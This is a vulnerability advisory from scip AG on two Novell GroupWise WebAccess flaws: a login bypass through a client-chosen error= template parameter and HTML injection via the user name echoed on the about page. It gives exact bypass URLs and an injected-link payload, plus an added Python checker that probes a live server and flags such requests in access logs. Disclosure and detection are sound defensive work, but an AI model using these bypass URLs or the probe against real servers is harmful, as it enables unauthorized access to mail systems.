
Novell GroupWise WebAccess error modules loading



 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dear ladies and gentlemen,

We have found a potential security vulnerability in the error module handling 
of Novell GroupWise WebAccess. First, it is possible to circumvent the login 
procedure. A user who connects to https://www.scip.com:1444/servlet/webacc (our 
own domain, used here only as an example) is asked to authenticate with user 
name and password. If wrong input is given, the webacc application loads the 
error page. The error document to be loaded can be chosen by the client through 
the query-string parameter error. If that parameter points to webacc itself, 
i.e. the URL https://www.scip.com:1444/servlet/webacc?error=webacc is 
requested, the login is circumvented: you are always logged in as a "ghost 
user" without a profile. It does not seem to be possible to load or store data 
or to use other services (e.g. the address book or sending email). It is also 
possible to reach specific template files by giving their names (e.g. 
https://www.scip.com:1444/servlet/webacc?error=send for the send-mail 
template). Reaching files other than those with the extension .htt, or files 
outside the web server root directory, does not seem possible. An attacker may 
use this vulnerability as a stepping stone to a bug that is only exploitable by 
authenticated users. More details on how this .htt template framework is meant 
to be used can be found at 
http://developer.novell.com/ndk/doc/gwwbacc/index.html?page=/ndk/doc/gwwbacc/gwwebacc/data/a6l4t54.html
The original advisory, written in German, is at 
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=1020 (Novell GroupWise WebAccess 
error Authentisierung umgehen, i.e. authentication bypass through the error 
parameter).

The second flaw builds on the first one. In the login screen you can enter an 
arbitrary (wrong) user name; afterwards you circumvent the authentication as 
described above. If you then open the about screen (e.g. 
https://www.scip.com:1444/servlet/webacc?error=about, or by clicking the 
WebAccess logo at the top), the Program Release line shows the version data of 
the GroupWise installation, and the Userid line prints the user name given in 
your last login attempt. This allows HTML injection: if the user name "<a 
href=http://www.scip.ch>www.scip.ch</a>" was entered, this HTML link is 
rendered. Injecting scripts does not seem possible, because the required tags 
<script> and </script> are filtered/replaced. Note that the injected name is 
shown to the browser that entered it, so a victim would first have to be 
induced to submit the attacker's user name. This vulnerability may be useful to 
gain the version data of the installation, and it may allow a social 
engineering or HTML injection attack (e.g. embedding a reference to a malformed 
JPEG file to trigger the Windows JPEG buffer overflow). The original advisory, 
written in German, is at 
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=1021 (Novell GroupWise WebAccess 
error about erweiterte Rechte, i.e. extended privileges through the about 
error page).
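
The following checker is added here as an example and is not part of the 
advisory, of scip AG's ATK plugin, or of Novell's code. It exercises both 
flaws described above: it builds the ?error=<template> probe URLs, decides 
whether the response to error=webacc is the login form or an already "logged 
in" template, extracts the Program Release line from the about page and tells 
an unescaped canary user name from an entity-encoded one, and, for the 
defender, flags access-log entries that carry a client-chosen error= value. 
Its assumptions are the URL layout from the advisory, that only the login 
template contains a password field, that the about page prints "Program 
Release" and "Userid" as text lines, and that the embedded sample responses 
and log lines (constructed, not captured) resemble real ones. Run it with a 
base URL such as https://www.scip.com:1444 to perform the first probe live.

```python
"""Checker for the two WebAccess "error=" template issues described above.

Added example, not code from the advisory, from scip AG or from Novell.  It
assumes the advisory's URL layout (https://host:port/servlet/webacc), that the
about template prints "Program Release" and "Userid" as text lines, and that
the login template is the only one containing a password field.  All sample
responses and log lines below are constructed, not real captures.
"""
import html
import re
import sys
import urllib.error
import urllib.parse
import urllib.request

TEMPLATES = ("webacc", "about", "send")                # template names from the advisory
CANARY = '<a href="http://canary.invalid">canary</a>'  # user name to enter at the login


def probe_url(base, template):
    """Return https://host:port/servlet/webacc?error=<template> for a base URL."""
    return base.rstrip("/") + "/servlet/webacc?error=" + urllib.parse.quote(template, safe="")


def is_login_page(body):
    """Heuristic (assumption): only the login template asks for a password."""
    return re.search(r'type\s*=\s*["\']?password', body, re.I) is not None


def bypass_suspected(status, body):
    """First flaw: ?error=webacc answers 200 with something other than the login form."""
    return status == 200 and not is_login_page(body)


def analyze_about(body):
    """Second flaw: read the version line and see how the echoed user name was encoded."""
    release = re.search(r"Program Release\s*:?\s*([^\n<]+)", body)
    userid = re.search(r"Userid\s*:?\s*([^\n]+)", body)
    userid_text = userid.group(1).strip() if userid else ""
    return {
        "release": release.group(1).strip() if release else None,
        "html_injected": CANARY in userid_text,         # tag echoed back verbatim
        "escaped": html.escape(CANARY) in userid_text,  # server entity-encoded the tag
    }


LOG_RE = re.compile(r'"(?:GET|POST) (/servlet/webacc\?[^ "]*) HTTP')


def flag_template_requests(log_lines):
    """Detection: (template, client) for every request naming an error= template."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        query = urllib.parse.urlsplit(m.group(1)).query
        for value in urllib.parse.parse_qs(query).get("error", []):
            hits.append((value, line.split()[0]))
    return hits


def probe_live(base, timeout=10):
    """Fetch each template from a real server; returns {template: (status, body)}."""
    out = {}
    for name in TEMPLATES:
        req = urllib.request.Request(probe_url(base, name), headers={"User-Agent": "webacc-check"})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                out[name] = (resp.status, resp.read().decode("latin-1"))
        except urllib.error.HTTPError as exc:
            out[name] = (exc.code, exc.read().decode("latin-1"))
    return out


# Constructed stand-ins for a vulnerable server's responses and its access log.
SAMPLE_LOGIN = '<form><input type="text" name="user"><input type="password" name="pw"></form>'
SAMPLE_ABOUT_VULN = "Program Release: 0.0 (constructed)\nUserid: " + CANARY + "\n"
SAMPLE_ABOUT_FIXED = "Program Release: 0.0 (constructed)\nUserid: " + html.escape(CANARY) + "\n"
SAMPLE_LOG = [
    '203.0.113.5 - - [14/Dec/2004:10:00:00 +0100] "GET /servlet/webacc?error=webacc HTTP/1.1" 200 1234',
    '203.0.113.5 - - [14/Dec/2004:10:00:01 +0100] "GET /servlet/webacc?error=about HTTP/1.1" 200 987',
    '198.51.100.7 - - [14/Dec/2004:10:00:02 +0100] "POST /servlet/webacc HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    if len(sys.argv) > 1:                        # e.g. https://www.scip.com:1444
        for name, (status, body) in probe_live(sys.argv[1]).items():
            print(name, status, "bypass?" if bypass_suspected(status, body) else "login form")
    else:
        print("webacc bypass:", bypass_suspected(200, SAMPLE_LOGIN))
        print("about (vuln) :", analyze_about(SAMPLE_ABOUT_VULN))
        print("about (fixed):", analyze_about(SAMPLE_ABOUT_FIXED))
        print("log hits     :", flag_template_requests(SAMPLE_LOG))
```

The live path only fetches the three templates. Checking the about page for 
the injection needs a preceding login POST with CANARY as the user name, and 
the form field names for that POST depend on the installed login template, so 
analyze_about() is meant to be run over the saved response of that step. The 
log check flags every request that names an error= template at all; a 
legitimate client never needs to supply that parameter itself.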

We have not found any information on this issue. So I sent this information 
(nearly the same posting) on 14/12/04 to info@xxxxxxxxxx and asked for a 
solution. As I had not heard _anything_ by 23/12/04, I sent a reminder email 
to the same address. Since no reply came back, we finally made this 
vulnerability public to force Novell to react to this case. An Attack Tool Kit 
(ATK) plugin that addresses this vulnerability will be published in the next 
days[1].

Regards,

Marc Ruef

[1] http://www.computec.ch/projekte/atk/

- -- 
) scip AG (
Technoparkstr. 1
8005 Zürich
T +41 1 445 18 18 
F +41 1 445 18 19

maru@xxxxxxx
www.scip.ch

- - Latest IT security vulnerabilities -

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0
Comment: http://www.scip.ch

iQA/AwUBQevrDBe5hzJzqVMhEQJrtQCg041eH6NVBOQ+GPS5QudSw2ARKAAAni/P
tTao1cSGtOUvnKKsqqH5/0Gs
=A+fy
-----END PGP SIGNATURE-----